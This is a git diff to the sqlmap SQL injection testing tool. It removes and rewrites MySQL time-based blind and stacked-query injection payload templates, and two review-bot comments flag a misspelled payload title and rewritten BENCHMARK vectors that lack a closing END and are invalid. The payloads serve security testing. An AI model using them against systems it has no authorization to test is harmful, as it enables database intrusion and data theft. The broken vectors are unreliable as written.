diff --git a/lib/core/settings.py b/lib/core/settings.py
index 04c5a0ec2..d03851fcf 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -19,7 +19,7 @@ from lib.core.enums import OS
 from lib.core.revision import getRevisionNumber
 # sqlmap version (...)
-VERSION = "1.0.5.94"
+VERSION = "1.0.5.95"
 REVISION = getRevisionNumber()
 STABLE = VERSION.count('.') <= 2
 VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
diff --git a/xml/payloads/04_stacked_queries.xml b/xml/payloads/04_stacked_queries.xml
index d156d693d..cf86feb4a 100644
--- a/xml/payloads/04_stacked_queries.xml
+++ b/xml/payloads/04_stacked_queries.xml
@@ -2,51 +2,10 @@ - - MySQL > 5.0.11 stacked queries (SLEEP - comment) - 4 - 1 - 1 - 0 - 1 - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - > 5.0.11 -
-
- - - MySQL > 5.0.11 stacked queries (SLEEP) - 4 - 2 - 1 - 0 - 1 - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - > 5.0.11 -
-
- MySQL > 5.0.11 stacked queries (comment) 4 - 2 + 1 1 0 1
@@ -67,7 +26,7 @@ MySQL > 5.0.11 stacked queries 4 - 3 + 2 1 0 1
diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml
index 4f8223f24..a88659533 100644
--- a/xml/payloads/05_time_blind.xml
+++ b/xml/payloads/05_time_blind.xml
@@ -2,92 +2,10 @@ - - MySQL >= 5.0.12 AND time-based blind (SLEEP) - 5 - 1 - 1 - 1,2,3,9 - 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - >= 5.0.12 -
-
- - - MySQL >= 5.0.12 OR time-based blind (SLEEP) - 5 - 1 - 3 - 1,2,3,9 - 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - >= 5.0.12 -
-
- - - MySQL >= 5.0.12 AND time-based blind (SLEEP - comment) - 5 - 3 - 1 - 1,2,3,9 - 1 - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - >= 5.0.12 -
-
- - - MySQL >= 5.0.12 OR time-based blind (SLEEP - comment) - 5 - 3 - 3 - 1,2,3,9 - 1 - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - >= 5.0.12 -
-
- MySQL >= 5.0.12 AND time-based blind 5 - 2 + 1 1 1,2,3,9 1
@@ -107,7 +25,7 @@ MySQL >= 5.0.12 OR time-based blind 5 - 2 + 1 3 1,2,3,9 1
@@ -127,7 +45,7 @@ MySQL >= 5.0.12 AND time-based blind (comment) 5 - 4 + 3 1 1,2,3,9 1
@@ -148,7 +66,7 @@ MySQL >= 5.0.12 OR time-based blind (comment) 5 - 4 + 3 3 1,2,3,9 1
@@ -248,51 +166,10 @@ - - MySQL >= 5.0.12 RLIKE time-based blind (SLEEP) - 5 - 2 - 1 - 1,2,3,9 - 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - >= 5.0.12 -
-
- - - MySQL >= 5.0.12 RLIKE time-based blind (SLEEP - comment) - 5 - 4 - 1 - 1,2,3,9 - 1 - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - # - - - - -
- MySQL - >= 5.0.12 -
-
MySQL >= 5.0.12 RLIKE time-based blind 5 - 5 + 2 1 1,2,3,9 1
@@ -312,7 +189,7 @@ MySQL >= 5.0.12 RLIKE time-based blind (comment) 5 - 5 + 4 1 1,2,3,9 1
@@ -1392,9 +1269,9 @@ 1 1,2,3,9 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)
@@ -1406,7 +1283,7 @@ - MySQL >= 5.0.12 time-based blind - Parameter replace (SLEEP) + MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) 5 3 1
@@ -1432,9 +1309,9 @@ 2 1,2,3,9 3 - (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]) - (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) + (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])
@@ -1769,9 +1646,9 @@ 1 2,3 1 - ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END)) - ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM] END))
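Review bot: The new title in the `@@ -1406,7 +1283,7 @@` hunk misspells the technique name: `MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)` should read `MySQL >= 5.0.12 time-based blind - Parameter replace (subtraction)`. Payload titles are, as far as I can tell, surfaced verbatim when sqlmap reports a confirmed injection point, so the typo would land in user-facing output and in anything that greps reports for it. Fixing the spelling now is cheaper than renaming a title that saved reports already quote. The rest of this payload's definition lies outside the hunk.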
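Review bot: The two rewritten BENCHMARK vectors in the `@@ -1432,9 +1309,9 @@` hunk lose the closing `END` of their CASE expression: `(CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM])` and the matching `([RANDNUM]=[RANDNUM])` vector are not valid MySQL, whereas the sibling SLEEP vectors rewritten in the `@@ -1392,9 +1269,9 @@` hunk correctly keep `... ELSE [RANDNUM] END)`. A payload that is a syntax error on every request can never produce the timing difference the inference relies on, so this fallback silently stops detecting anything — a false negative that is easy to miss precisely because the SLEEP variants still work. Both lines should end with `ELSE [RANDNUM] END)`. Dropping the old `(SELECT [RANDNUM] FROM mysql.db)` branch is otherwise welcome, since it removed a dependency on read access to the mysql schema that many targets do not grant.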